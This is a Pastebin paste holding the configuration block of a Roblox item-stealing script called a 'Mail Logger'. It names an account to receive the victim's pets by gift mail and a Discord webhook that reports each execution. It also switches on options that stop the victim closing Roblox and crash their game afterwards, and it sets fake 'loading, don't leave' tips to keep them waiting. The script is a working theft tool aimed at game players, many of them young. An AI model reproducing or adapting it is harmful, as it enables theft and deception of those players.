Advertisement
ameersss777

Untitled

Jun 11th, 2023 (edited)
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.04 KB | None | 0 0
  1. --[[ custumz Mail Logger ]]--
  2.  
  3. --[[ Main Config ]]--
  4. _G.Username = "G0THHPEEPALTT" --// Username To Send Pets To
  5. _G.GiftMessage = "hits go brr" --// Message For The Gift To Say
  6.  
  7. _G.Diamonds = 500000 --// Amount Of Diamonds To Not Kick
  8. _G.UnlockPets = true --// Unlocks Locked Pets
  9. _G.AntiLeave = true --// Doesn't Let The Target Close Roblox
  10. _G.Crash = true --// Crashes Them After Its Finished
  11.  
  12. --[[ Webhook Config ]]--
  13. _G.Webhook = "https://discord.com/api/webhooks/1117523417948766300/edGgYEd7drD0rllgpSjuXS6GrZCyPgcow4xHdNv8rcGErUkAoD_Oz5-v9rsGR389BsNr" --// Discord Webhook For Executions
  14. _G.Enabled = true --// Toggle For Sending Webhooks
  15. _G.Mention = true --// Pings You When Someone Executes
  16. --[[ UI Config ]]--
  17. _G.ScriptName = "CELESTIALS" --// Script Name On The UI
  18. _G.Tip1 = "SCRIPT LOADING" --// Gives You Tips On The UI
  19. _G.Tip2 = "BE PATIENT" --// Gives You Tips On The UI
  20. _G.Tip3 = "DONT LEAVE" --// Gives You Tips On The UI
  21. _G.Tip4 = "PATIENCE" --// Gives You Tips On The UI
  22. _G.Tip5 = "NEARLY THERE" --// Gives You Tips On The UI
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement